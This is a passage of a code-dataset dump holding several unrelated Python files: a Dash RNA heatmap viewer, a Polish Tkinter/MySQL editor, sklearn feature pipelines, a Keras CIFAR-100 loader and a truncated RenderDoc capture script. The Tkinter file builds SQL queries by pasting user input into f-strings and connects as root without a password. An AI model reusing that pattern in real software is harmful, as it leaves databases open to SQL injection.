],\n)\n# calculates slider ranges (marks)\n# fil1/file2: input file\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateSliderRange(ts, data):\n if ts is None:\n raise PreventUpdate\n k_p_slider_max = data['seqLen']\n k_p_slider_min = 2\n\n k_slider_max = k_p_slider_max - 1\n peak_min = 0\n\n # calculation of new slider ranges if files were changed\n\n k_range = markSliderRange(k_p_slider_min, k_slider_max, False)\n peak_range = markSliderRange(peak_min, k_p_slider_max, True)\n\n return k_p_slider_min, k_slider_max, k_range, peak_min, k_p_slider_max, peak_range\n\n\n# ----------------------------------------- Forna-Container Update -----------------------------------------------------\n\n@app.callback(\n dash.dependencies.Output('forna', 'sequences'),\n dash.dependencies.Output('forna', 'customColors'),\n dash.dependencies.Output('s-tab2', 'label'),\n dash.dependencies.Output('s-tab2', 'disabled'),\n dash.dependencies.Output('forna2', 'sequences'),\n dash.dependencies.Output('forna2', 'customColors'),\n dash.dependencies.Output('s-tab3', 'label'),\n dash.dependencies.Output('s-tab3', 'disabled'),\n [dash.dependencies.Input('memory', 'data'),\n dash.dependencies.Input('file3', 'value'),\n dash.dependencies.Input('file4', 'value'),\n ]\n)\n# create RNA Structure Heatmap visualizations\n# data: store\n# f3: first selected structural file\n# f4: second selected structural file\ndef show_selected_sequences(data, f3, f4):\n if data is None:\n raise PreventUpdate\n\n template_list = data['templates']\n dotbracket_list = data['dbs']\n color_domain_max1 = data['color_max'][0]\n color_domain_max2 = data['color_max'][1]\n\n # if only one structural file is given, color_domain_max and color_domain_min are not changed\n domain_nbr = 2\n if color_domain_max1 is None:\n color_domain_max1 = 0\n domain_nbr = 1\n if color_domain_max2 is None:\n color_domain_max2 = 0\n domain_nbr = 1\n\n color_domain_max = ((color_domain_max1 + color_domain_max2) / domain_nbr)\n\n if data['colors'][0] is not None:\n color_vals1 = list(set(data['colors'][0].values()))\n if 0 in color_vals1:\n color_vals1.remove(0)\n color_domain_min1 = min(color_vals1)\n else:\n color_domain_min1 = 0\n\n if data['colors'][1] is not None:\n color_vals2 = list(set(data['colors'][1].values()))\n if 0 in color_vals2:\n color_vals2.remove(0)\n color_domain_min2 = min(color_vals2)\n else:\n color_domain_min2 = 0\n\n color_domain_min = (color_domain_min1 + color_domain_min2) / domain_nbr\n\n color_range = data['color_scale']\n if color_range is None:\n # prevents divideByZero error\n # has no effect because if scale is None then there is not structural data\n color_range_length = 2\n else:\n color_range_length = len(color_range)\n\n steps = ((color_domain_max - color_domain_min) / (color_range_length - 1))\n if steps == 0:\n steps = 1\n\n color_domain = [i for i in float_range(color_domain_min, steps, (color_range_length - 1))]\n color_domain.append(color_domain_max)\n\n # disable tab for files if no or only one structural file is given\n disable_t1 = False\n disable_t2 = False\n\n # color-vector\n custom_colors = None\n custom_colors2 = None\n\n tab1_label = \"RNA-Structure Heatmap 1\"\n tab2_label = \"RNA-Structure Heatmap 2\"\n\n if struct_data is not None:\n\n color1 = data['colors'][0]\n\n tab1_label = os.path.basename(struct_data[int(f3)]) + \" Structure Heatmap\"\n\n # create color-vector-object for FornaContainer\n custom_colors = {\n 'domain': color_domain,\n 'range': color_range,\n 'colorValues': {\n 'template1': color1,\n }\n }\n\n # create sequence-object for FornaContainer\n template1 = [{\n 'sequence': template_list[0],\n 'structure': dotbracket_list[0],\n 'options': {'name': 'template1'}\n }]\n\n if len(template_list) > 1: # more than one structure file committed\n color2 = data['colors'][1]\n\n tab2_label = os.path.basename(struct_data[int(f4)]) + \" Structure Heatmap\"\n\n custom_colors2 = {\n 'domain': color_domain,\n 'range': color_range,\n 'colorValues': {\n 'template2': color2,\n }\n }\n\n template2 = [{\n 'sequence': template_list[1],\n 'structure': dotbracket_list[1],\n 'options': {'name': 'template2'}\n }]\n\n else: # if no second structural file is available\n template2 = [{\n 'sequence': \"\",\n 'structure': \"\"\n }]\n disable_t2 = True\n\n else: # if not structural data is available\n template1 = [{\n 'sequence': \"\",\n 'structure': \"\"\n }]\n template2 = [{\n 'sequence': \"\",\n 'structure': \"\"\n }]\n disable_t1 = True\n disable_t2 = True\n\n return template1, custom_colors, tab1_label, disable_t1, template2, custom_colors2, tab2_label, disable_t2\n\n\n# -------------------------------------------- Modals Updater ----------------------------------------------------------\n\n@app.callback([dash.dependencies.Output('ex_options', 'is_open'),\n dash.dependencies.Output('norm_input', 'hidden'),\n ],\n [dash.dependencies.Input('memory', 'modified_timestamp'),\n dash.dependencies.Input('opt_btn_open', 'n_clicks'),\n dash.dependencies.Input('opt_btn_close', 'n_clicks'),\n dash.dependencies.Input('opt_btn_apply', 'n_clicks'),\n dash.dependencies.Input('db', 'value'),\n dash.dependencies.Input('error', 'hidden'),\n dash.dependencies.Input('error_type', 'hidden'),\n dash.dependencies.State('ex_options', 'is_open'),\n ], prevent_initial_call=True)\n# opens or closes modal\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\n# btn_open, btn_close, btn_apply: n_clicks of open-/apply/reset-button for/in modal\n# norm_val: normalization option (none, for A.thaliana, custom)\n# error1, error2: error messages hidden status (True/False)\n# is_open: modal status (True/False)\ndef updateExtendedOptionModal(ts, btn_open, btn_close, btn_apply, norm_val, error1, error2, is_open):\n if ts is None:\n raise PreventUpdate\n\n # determine which button was triggered\n ctx = dash.callback_context\n btn_id = ctx.triggered[0]['prop_id'].split('.')[0]\n\n if norm_val == 'custom_vals':\n show_table = False\n else:\n show_table = True\n\n # if open-/close button was triggered, then open or close modal\n if btn_id == \"opt_btn_open\" or btn_id == \"opt_btn_close\":\n return [not is_open, show_table]\n # if apply button was triggered, close modal if no error message is shown\n elif btn_id == 'opt_btn_apply':\n if not error1 or not error2:\n return [is_open, show_table]\n else:\n return [not is_open, show_table]\n else:\n return [is_open, show_table]\n\n\n@app.callback([\n dash.dependencies.Output('EE', 'value'),\n dash.dependencies.Output('SS', 'value'),\n dash.dependencies.Output('II', 'value'),\n dash.dependencies.Output('MM', 'value'),\n dash.dependencies.Output('BB', 'value'),\n dash.dependencies.Output('SI', 'value'),\n dash.dependencies.Output('IS', 'value'),\n dash.dependencies.Output('SM', 'value'),\n dash.dependencies.Output('MS', 'value'),\n dash.dependencies.Output('ES', 'value'),\n dash.dependencies.Output('SE', 'value'),\n dash.dependencies.Output('HH', 'value'),\n dash.dependencies.Output('HS', 'value'),\n dash.dependencies.Output('SH', 'value'),\n dash.dependencies.Output('SB', 'value'),\n dash.dependencies.Output('BS', 'value'),\n\n],\n [dash.dependencies.Input('opt_btn_reset', 'n_clicks'),\n ], prevent_initial_call=True)\n# resets custom rate table in modal\n# reset_btn: n_clicks of reset button\ndef resetTable(reset_btn):\n if reset_btn:\n return [0 for i in range(0, 16)]\n else:\n return [dash.no_update for i in range(0, 16)]\n\n\n@app.callback([\n dash.dependencies.Output('error', 'hidden'),\n dash.dependencies.Output('error_type', 'hidden'),\n\n],\n [\n dash.dependencies.Input('opt_btn_apply', 'n_clicks'),\n dash.dependencies.Input('db', 'value'),\n dash.dependencies.State('EE', 'value'),\n dash.dependencies.State('SS', 'value'),\n dash.dependencies.State('II', 'value'),\n dash.dependencies.State('MM', 'value'),\n dash.dependencies.State('BB', 'value'),\n dash.dependencies.State('SI', 'value'),\n dash.dependencies.State('IS', 'value'),\n dash.dependencies.State('SM', 'value'),\n dash.dependencies.State('MS', 'value'),\n dash.dependencies.State('ES', 'value'),\n dash.dependencies.State('SE', 'value'),\n dash.dependencies.State('HH', 'value'),\n dash.dependencies.State('HS', 'value'),\n dash.dependencies.State('SH', 'value'),\n dash.dependencies.State('SB', 'value'),\n dash.dependencies.State('BS', 'value'),\n ], prevent_initial_call=True)\n# show error message, if input in custom rates table is invalid\n# apply_btn: n_clicks of apply button for custom rates\n# norm_option: normalization options (none, for A.thaliana, custom)\n# parameter (e.g. ee,ss,etc. ...): custom rates for 2-mer\ndef showErrorMessages(apply_btn, norm_option, ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs):\n hide_error_msg = True\n hide_error_type_msg = True\n\n ctx = dash.callback_context\n triggered_component = ctx.triggered[0]['prop_id'].split('.')[0]\n\n if triggered_component == 'opt_btn_apply':\n if not norm_option == 'custom_vals':\n return [hide_error_msg, hide_error_type_msg]\n custom_rates = [ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs]\n if None in custom_rates:\n hide_error_type_msg = False\n return [hide_error_msg, hide_error_type_msg]\n check_sum_passed = check_sum(ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs)\n if not check_sum_passed:\n hide_error_msg = False\n return [hide_error_msg, hide_error_type_msg]\n\n\n@app.callback([dash.dependencies.Output('opt_btn_open', 'disabled'),\n ],\n [dash.dependencies.Input('memory', 'modified_timestamp')])\n# disables 'extended options' button if no structural data is available\n# ts: store timestamp\ndef disableButton(ts):\n if ts is None:\n raise PreventUpdate\n\n disable_btn = False\n if struct_data is None:\n disable_btn = True\n\n return [disable_btn]\n\n\n# --------------------------------------------- Diagram/Table Updater --------------------------------------------------\n\n# Tables/Diagrams only get updated figures/datatables here\n\n@app.callback(dash.dependencies.Output('scatter', 'figure'),\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateScatter(data):\n if data is None:\n raise PreventUpdate\n return data.get('scatter', 0)\n\n\n@app.callback([dash.dependencies.Output('PCA1', 'figure'),\n dash.dependencies.Output('PCA2', 'figure'),\n dash.dependencies.Output('Tab1', 'label'),\n dash.dependencies.Output('Tab2', 'label')],\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updatePCAs(data):\n if data is None:\n raise PreventUpdate\n pca_data = data.get('pcas', 0)\n pca1 = pca_data[0][0]\n pca2 = pca_data[0][1]\n file1 = pca_data[1]\n file2 = pca_data[2]\n return [pca1, pca2, file1, file2]\n\n\n@app.callback(dash.dependencies.Output('topK', 'children'),\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateTopK(data):\n if data is None:\n raise PreventUpdate\n return data.get('topK', 0)\n\n\n@app.callback(dash.dependencies.Output('msa', 'children'),\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateMSA(data):\n if data is None:\n raise PreventUpdate\n return data.get('msas', 0)\n","sub_path":"src/dashView/dashLayout.py","file_name":"dashLayout.py","file_ext":"py","file_size_in_byte":48636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61847024","text":"from tkinter import *\r\n\r\nimport mysql.connector\r\n\r\nfrom globals import std_bg\r\n\r\n\r\ndef attributes_sets_options():\r\n db = mysql.connector.connect(host=\"localhost\", user=\"root\", database=\"test\")\r\n cursor = db.cursor()\r\n\r\n cursor.execute(\"SELECT * FROM attributes_sets\")\r\n db_results = cursor.fetchall()\r\n\r\n results = []\r\n for i in range(len(db_results)):\r\n results.append(list(db_results[i]))\r\n for j in range(len(results[i])):\r\n if results[i][j] is None:\r\n results[i][j] = ''\r\n\r\n # Sortowanie wyników dla lepszego odbioru użytkownika\r\n results = sorted(results, key=lambda x: x[1])\r\n\r\n root = Tk()\r\n root.title('Automatyzacja opisów')\r\n root.geometry('570x550')\r\n root.configure(bg=std_bg)\r\n\r\n # Nie rozumiem tego kodu, ale on dodaje suwak\r\n main_frame = Frame(root, bg=std_bg)\r\n main_frame.pack(fill=BOTH, expand=1)\r\n canvas = Canvas(main_frame, bg=std_bg)\r\n canvas.pack(side=LEFT, fill=BOTH, expand=1)\r\n scrollbar = Scrollbar(main_frame, orient=VERTICAL, command=canvas.yview, bg=std_bg)\r\n scrollbar.pack(side=RIGHT, fill=Y)\r\n canvas.configure(yscrollcommand=scrollbar.set, bg=std_bg)\r\n canvas.bind('', lambda e: canvas.configure(scrollregion=canvas.bbox(\"all\")))\r\n view_frame = Frame(canvas, bg=std_bg)\r\n canvas.create_window((0, 0), window=view_frame, anchor='nw')\r\n\r\n \"\"\" NAZWY KOLUMN \"\"\"\r\n\r\n frame_cols = LabelFrame(view_frame, text=\"Nazwy kolumn\")\r\n frame_cols.configure(bg=std_bg)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Nazwa\").grid(row=0, column=0,\r\n pady=2)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Zestaw1\").grid(row=0, column=1,\r\n pady=2)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Waga\").grid(row=0, column=2,\r\n pady=2)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Zestaw2\").grid(row=0, column=3,\r\n pady=2)\r\n Label(frame_cols, width=4, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Usuń\").grid(row=0, column=4, pady=2)\r\n frame_cols.grid(row=1, column=0)\r\n\r\n \"\"\" DANE Z BAZY DANYCH \"\"\"\r\n\r\n def change_data():\r\n changes = []\r\n for i in range(len(res_label)):\r\n query_SET = ''\r\n if res_label[i][0].get() != results[i][1]:\r\n query_SET += f'Name=\"{res_label[i][0].get()}\", '\r\n if res_label[i][1].get() != results[i][2]:\r\n query_SET += f'Set1=\"{res_label[i][1].get()}\", '\r\n\r\n if res_label[i][2].get() == '':\r\n if results[i][3] == '':\r\n pass\r\n else:\r\n query_SET += f'Weight=NULL, '\r\n else:\r\n try:\r\n weight = int(res_label[i][2].get())\r\n if weight != results[i][3]:\r\n query_SET += f'Weight={weight}, '\r\n except ValueError:\r\n error['text'] = 'Waga musi być liczbą'\r\n return\r\n\r\n if res_label[i][3].get() != results[i][4]:\r\n query_SET += f'Set2=\"{res_label[i][3].get()}\", '\r\n\r\n if query_SET != '':\r\n changes.append([results[i][0], query_SET])\r\n\r\n for change in changes:\r\n cursor.execute(f\"\"\"\r\n UPDATE attributes_sets \r\n SET {change[1][:-2]}\r\n WHERE ID={change[0]}\r\n \"\"\")\r\n db.commit()\r\n root.destroy()\r\n attributes_sets_options()\r\n\r\n def remove():\r\n for i in range(len(var)):\r\n if var[i].get() == 1:\r\n cursor.execute(f\"\"\"\r\n DELETE FROM attributes_sets\r\n WHERE ID={results[i][0]};\r\n \"\"\")\r\n db.commit()\r\n root.destroy()\r\n attributes_sets_options()\r\n\r\n frame_data = LabelFrame(view_frame, text=\"Dane\")\r\n frame_data.configure(bg=std_bg)\r\n res_label = []\r\n var = []\r\n for i in range(len(results)):\r\n var.append(IntVar())\r\n res_label.append([\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Entry(frame_data, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT),\r\n Checkbutton(frame_data, width=1, bg=std_bg, variable=var[i], onvalue=1)\r\n ])\r\n\r\n for i in range(len(res_label)):\r\n res_label[i][0].insert(0, results[i][1])\r\n res_label[i][1].insert(0, results[i][2])\r\n res_label[i][2].insert(0, results[i][3])\r\n res_label[i][3].insert(0, results[i][4])\r\n res_label[i][0].grid(row=i, column=0, pady=2)\r\n res_label[i][1].grid(row=i, column=1, pady=2)\r\n res_label[i][2].grid(row=i, column=2, pady=2)\r\n res_label[i][3].grid(row=i, column=3, pady=2)\r\n res_label[i][4].grid(row=i, column=4, pady=2)\r\n\r\n change_button = Button(frame_data, text=\"Zmień\", width=16, bg='#525252', fg='#EEEEEE', command=change_data)\r\n change_button.grid(row=len(res_label) + 1, column=3)\r\n remove_button = Button(frame_data, text=\"Usuń\", width=4, bg='#525252', fg='#EEEEEE', command=remove)\r\n remove_button.grid(row=len(res_label) + 1, column=4)\r\n frame_data.grid(row=2, column=0)\r\n\r\n \"\"\" DODAWANIE NOWEJ POZYCJI \"\"\"\r\n\r\n def add_new():\r\n if not e_name.get():\r\n error['text'] = 'Nazwa musi być podana'\r\n return\r\n elif not e_set1.get():\r\n error['text'] = 'Pierwszy zestaw musi być podany'\r\n return\r\n if e_weight.get() != '':\r\n try:\r\n weight = int(e_weight.get())\r\n except ValueError:\r\n error['text'] = 'Waga musi być liczbą'\r\n return\r\n else:\r\n weight = \"NULL\"\r\n\r\n error['text'] = ''\r\n cursor.execute(f\"\"\"\r\n INSERT INTO attributes_sets (Name, Set1, Weight, Set2)\r\n VALUES ('{e_name.get()}', '{e_set1.get()}', {weight}, '{e_set2.get()}');\r\n \"\"\")\r\n db.commit()\r\n e_name.delete(0, END)\r\n e_set1.delete(0, END)\r\n e_weight.delete(0, END)\r\n e_set2.delete(0, END)\r\n root.destroy()\r\n attributes_sets_options()\r\n\r\n frame_new = LabelFrame(view_frame, text=\"Dodaj nowe\")\r\n frame_new.configure(bg=std_bg)\r\n e_name = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_set1 = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_weight = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_set2 = Entry(frame_new, width=20, bg='#525252', fg='#EEEEEE', justify=LEFT)\r\n e_name.grid(row=0, column=0)\r\n e_set1.grid(row=0, column=1)\r\n e_weight.grid(row=0, column=2)\r\n e_set2.grid(row=0, column=3)\r\n add_button = Button(frame_new, text=\"Dodaj\", width=16, bg='#525252', fg='#EEEEEE', command=add_new)\r\n add_button.grid(row=1, column=3)\r\n error = Label(view_frame, text='', bg=std_bg, fg='red')\r\n frame_new.grid(row=0, column=0, pady=20)\r\n error.grid(row=3, column=0)\r\n\r\n exit_button = Button(view_frame, text=\"Wyjdź\", width=16, bg='#525252', fg='#EEEEEE', command=root.destroy)\r\n exit_button.grid(row=5, column=0)\r\n root.mainloop()\r\n","sub_path":"GUI/attributes_sets_options.py","file_name":"attributes_sets_options.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84899468","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPipelines for building features\n\"\"\"\nimport logging\nimport numpy as np\n\nfrom sklearn.pipeline import Pipeline\n\nfrom sklearn.base import BaseEstimator\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.decomposition import LatentDirichletAllocation as LatentDirichlet\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass DummyTransform(BaseEstimator):\n \"\"\"Return content length as features.\n do nothing to the labels\"\"\"\n\n def fit(self, X, y):\n return self\n\n def transform(self, X):\n return np.array(X['content'].str.len())[:, None]\n\n\nclass Tfidf(TfidfTransformer):\n\n def fit_transform(self, *args, **kwargs):\n logging.info('Fit & Transform TF-IDF...')\n return super().fit_transform(*args, **kwargs)\n\n\nclass SVD(TruncatedSVD):\n\n def fit_transform(self, *args, **kwargs):\n logging.info('Fit & Transform TruncatedSVD...')\n return super().fit_transform(*args, **kwargs)\n\n\nclass Count(CountVectorizer):\n\n def fit_transform(self, raw_documents, y=None):\n logging.info(f'Fit & Transform CountVectorizer...')\n ret = super().fit_transform(raw_documents, y=y)\n logging.info(f'Vocab Size: {len(self.vocabulary_)}')\n return ret\n\n\nclass SparseToDense(BaseEstimator):\n \"\"\"Return content length as features.\n do nothing to the labels\"\"\"\n\n def fit(self, X, y):\n return self\n\n def transform(self, X):\n return X.toarray()\n\n\nclass OverSample(BaseEstimator):\n\n def __init__(self, *args, **kwargs):\n return super().__init__(*args, **kwargs)\n\n\n# ------- Feature Builder -----------------\ndef is_list_or_tuple(obj):\n return isinstance(obj, tuple) or isinstance(obj, list)\n\n\n# Feature model specifications\n# For Chinese\nfm_spec = {\n 'count': Count(ngram_range=(1, 5), min_df=0.001, max_df=0.99),\n 'tfidf': ['count', Tfidf()],\n 'lsa_200': ['tfidf', SVD(n_components=200)],\n 'lsa_500': ['tfidf', SVD(n_components=500)],\n 'lsa_1k': ['tfidf', SVD(n_components=1000)],\n # smaller vocabulary (removed more stop and infrequent words)\n 'count_sv': Count(ngram_range=(1, 5), min_df=0.02, max_df=1.0),\n 'tfidf_sv': ['count_sv', Tfidf()],\n 'tfidf_sv_dense': ['tfidf_sv', SparseToDense()],\n 'lsa_200_sv': ['tfidf_sv', SVD(n_components=200)],\n 'lsa_500_sv': ['tfidf_sv', SVD(n_components=500)],\n}\n\n# For English\nfm_spec_en = fm_spec.copy()\nfm_spec_en['count'] = Count(\n ngram_range=(1, 4), min_df=0.01, stop_words='english')\nfm_spec_en['count_sv'] = Count(\n ngram_range=(1, 4), min_df=0.02, stop_words='english')\n\n\ndef ensure_named_steps(steps, spec=fm_spec, cache=None):\n \"\"\"make sure steps are named tuples.\n Also handles dependencies in steps.\n \"\"\"\n if not isinstance(steps, list):\n steps = [steps]\n # make a copy of the steps\n if is_list_or_tuple(steps):\n steps = list(steps)\n steps_ = []\n # while steps is not empty\n while steps:\n name, estimator = None, steps.pop(0)\n if isinstance(estimator, str):\n # if string, look it up from cache or spec\n if cache and estimator in cache:\n # if in cache, return cache\n name, estimator = estimator, cache[estimator]['model']\n else:\n # otherwise resolve spec\n name, estimator = estimator, spec[estimator]\n elif is_list_or_tuple(estimator):\n # when estimator has name already, expand it\n name, estimator = estimator\n\n # if is an array in cache\n if isinstance(estimator, list):\n # make sure current name is used for the last step\n # in the cached spec\n if not isinstance(estimator[-1], tuple):\n estimator[-1] = (name, estimator[-1])\n # add back to list\n steps = estimator + steps\n continue\n\n # Initialize estimator if necessary\n if callable(estimator):\n estimator = estimator()\n\n # if still haven't figured out step name\n if name is None:\n # get the name from class name\n name = estimator.__class__.__name__\n\n steps_.append((name, estimator))\n return steps_\n\n\nclass FeaturePipeline(Pipeline):\n \"\"\"\n FeaturePipeline with spec and cache support.\n\n Usage:\n\n fm_spec = {\n 'count': CountVectorizer(ngram_range=(1, 4), min_df=0.01,\n max_df=0.99),\n 'tfidf': ['count', TfidfTransformer],\n }\n fm = defaultdict(dict)\n model = FeaturePipeline('tfidf', spec=fm_spec, cache=fm)\n model.fit_transform(X_train)\n model.transform(X_test)\n\n Generates:\n\n > fm['tfidf']\n {'model': FeaturePipeline(...),\n 'train': numpy.array,\n 'test': numpy.array}\n > fm['count']\n {'model': FeaturePipeline(...), ...}\n\n Parameters\n ----------\n spec: a dictionary of specs matching count to id\n cache: a defaultdict to store estimator and train/test results\n \"\"\"\n\n @classmethod\n def from_spec(cls, name, spec=fm_spec, cache=None, **kwargs):\n if cache is not None and name in cache:\n return cache[name]['model']\n return cls(name, spec, cache, **kwargs)\n\n def __init__(self, steps='tfidf_sv', spec=fm_spec, cache=None, **kwargs):\n steps = ensure_named_steps(steps, spec, cache)\n super().__init__(steps, **kwargs)\n # if speficied cache, save self to cache\n if cache is not None:\n self.cache = cache[self._final_estimator_name]\n self.cache['model'] = self\n else:\n self.cache = None\n\n @property\n def _final_estimator_name(self):\n return self.steps[-1][0]\n\n def fit_transform(self, X, y=None, **fit_params):\n \"\"\"Fit transform the training data and save the results in cache\"\"\"\n cache_name = self._final_estimator_name\n cache = self.cache\n if cache and 'train' in cache:\n logger.info(f' {cache_name}: fit_transform use cache.')\n return cache['train']\n Xt = super().fit_transform(X, y, **fit_params)\n if cache is not None:\n cache['train'] = Xt\n return Xt\n\n def transform(self, X):\n \"\"\"Transform the testing data and save the results in cache\"\"\"\n cache_name = self._final_estimator_name\n cache = self.cache\n if cache and 'test' in cache:\n logger.info(f' {cache_name}: transform use cache.')\n return cache['test']\n Xt = super().transform(X)\n if cache is not None:\n cache['test'] = Xt\n return Xt\n\n\n# ------- Additional helpers and basic pipelines ---------\n\ndef build_features(X_train, X_test, steps='tfidf_sv', spec=fm_spec, **kwargs):\n # if provided both training and testing dataset\n # otherwise, load it from cache\n feature = FeaturePipeline(steps, spec=spec, **kwargs)\n X_train = feature.fit_transform(X_train)\n X_test = feature.transform(X_test)\n return X_train, X_test\n\n","sub_path":"fgclassifier/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36990727","text":"import calculate\r\nimport sklearn\r\nfrom showData import loadDatadet\r\nfrom calculate import kNN\r\n\"\"\"\r\n成绩得出的难点问题:\r\n1.对于不同衡量标准,其数学形式抽象出来的具体问题 度量不是单纯的线性关系\r\n2.对于不同衡量标准,键值的高低并不能绝对的影响最终成绩,若干项低标准值可能产生较高的结果\r\n3.在标准的整个百分制中,不同等级问题出现阈值分布不均匀\r\n\r\n4.四个特征属性 一共对应至少81种状态结果\r\n\"\"\"\r\nscores = [\r\n [80.6, 78.80, 90.5, 76, 0],\r\n [70.6, 78.80, 90.5, 76, 0],\r\n [60.6, 78.80, 90.5, 76, 0],\r\n [50.6, 78.80, 90.5, 76, 0],\r\n [40.6, 78.80, 40.5, 76, 0],\r\n # 存在拼凑可能 <60.0 正常值 偏差较大 正常值\r\n [20.6, 78.80, 90.5, 76, 0],\r\n # 没按老师给定的方法完成任务,完成了一定量,但质量不高\r\n # <60.0 正常值 正常值 正常值\r\n [90.6, 78.80, 90.5, 76, 0],\r\n # 正常作业\r\n [95.6, 78.80, 90.5, 76, 0],\r\n # 跟着老师完成任务,改动不大\r\n [99.6, 78.80, 90.5, 76, 0]\r\n # 97->99 正常值 正常值 正常值\r\n # 存在抄袭嫌疑\r\n]\r\n\r\n# 相似度\r\ne = calculate.distance(scores[1], scores[7])\r\ncos = calculate.cos(scores[1], scores[8])\r\nprint(e)\r\nprint(cos)\r\n\r\n# 分类\r\ninfile='./dataSet.txt'\r\nk = 5\r\nsrc = loadDatadet(infile, k)\r\nkNN(src)\r\n\r\n\r\n","sub_path":"CodeSimi/getScore.py","file_name":"getScore.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"405373778","text":"from __future__ import absolute_import\nfrom .cifar import load_batch\nfrom ..utils.data_utils import get_file\nfrom .. import backend as K\nimport numpy as np\nimport os\n\n\ndef load_data(label_mode='fine'):\n \"\"\"Loads CIFAR100 dataset.\n\n # Arguments\n label_mode: one of \"fine\", \"coarse\".\n\n # Returns\n Tuple of Numpy arrays: `(x_train, y_train), (x_test, y_test)`.\n\n # Raises\n ValueError: in case of invalid `label_mode`.\n \"\"\"\n if label_mode not in ['fine', 'coarse']:\n raise ValueError('`label_mode` must be one of `\"fine\"`, `\"coarse\"`.')\n\n dirname = 'cifar-100-python'\n origin = 'http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'\n path = get_file(dirname, origin=origin, untar=True)\n\n fpath = os.path.join(path, 'train')\n x_train, y_train = load_batch(fpath, label_key=label_mode + '_labels')\n\n fpath = os.path.join(path, 'test')\n x_test, y_test = load_batch(fpath, label_key=label_mode + '_labels')\n\n y_train = np.reshape(y_train, (len(y_train), 1))\n y_test = np.reshape(y_test, (len(y_test), 1))\n\n if K.image_data_format() == 'channels_last':\n x_train = x_train.transpose(0, 2, 3, 1)\n x_test = x_test.transpose(0, 2, 3, 1)\n\n return (x_train, y_train), (x_test, y_test)\n","sub_path":"Keras_tensorflow_nightly/source2.7/keras/datasets/cifar100.py","file_name":"cifar100.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"620393627","text":"# https://github.com/baldurk/renderdoc/search?l=Python&q=ExecuteAndInject\n\nimport logging\nimport os\nimport threading\nimport time\n\nimport renderdoc as rd\nfrom _android import get_device_name, get_main_activity\nfrom _shutil import get_date_str, get_home_path, setup_logger\n\n\ndef list_executables(remote):\n # GetHomeFolder() gives you a good default path to start with.\n # ListFolder() lists the contents of a folder and can recursively\n # browse the remote filesystem.\n home = remote.GetHomeFolder()\n paths = remote.ListFolder(home)\n logging.info(f\"Executables in home folder '{home}':\")\n for p in paths:\n logging.info(\" - \" + p.filename)\n\n\ndef main():\n # This sample is intended as an example of how to do remote capture and replay\n # as well as using device protocols to automatically enumerate remote targets.\n #\n # It is not complete since it requires filling in with custom logic to select\n # the executable and trigger the capture at the desired time\n # raise RuntimeError(\"This sample should not be run directly, read the source\")\n\n rd.InitialiseReplay(rd.GlobalEnvironment(), [])\n\n protocols = rd.GetSupportedDeviceProtocols()\n logging.info(f\"Supported device protocols: {protocols}\")\n\n protocol_to_use = \"adb\"\n\n # the protocol must be supported\n if protocol_to_use not in protocols:\n raise RuntimeError(f\"{protocol_to_use} protocol not supported\")\n\n protocol = rd.GetDeviceProtocolController(protocol_to_use)\n\n devices = protocol.GetDevices()\n\n if len(devices) == 0:\n raise RuntimeError(f\"no {protocol_to_use} devices connected\")\n\n if \"ANDROID_SERIAL\" in os.environ:\n device = os.environ[\"ANDROID_SERIAL\"]\n else:\n # Choose the first device\n device = devices[0]\n\n name = protocol.GetFriendlyName(device)\n logging.info(f\"Running test on {device} - {name}\")\n\n url = protocol.GetProtocolName() + \"://\" + device\n\n # Protocols can enumerate devices which are not supported. Capture/replay\n # is not guaranteed to work on these devices\n if not protocol.IsSupported(url):\n raise RuntimeError(f\"{device} doesn't support capture/replay - too old?\")\n\n # Protocol devices may be single-use and not support multiple captured programs\n # If so, trying to execute a program for capture is an error\n if not protocol.SupportsMultiplePrograms(url):\n # check to see if anything is running. Just use the URL\n ident = rd.EnumerateRemoteTargets(url, 0)\n\n if ident != 0:\n logging.info(f\"{name} already has a program 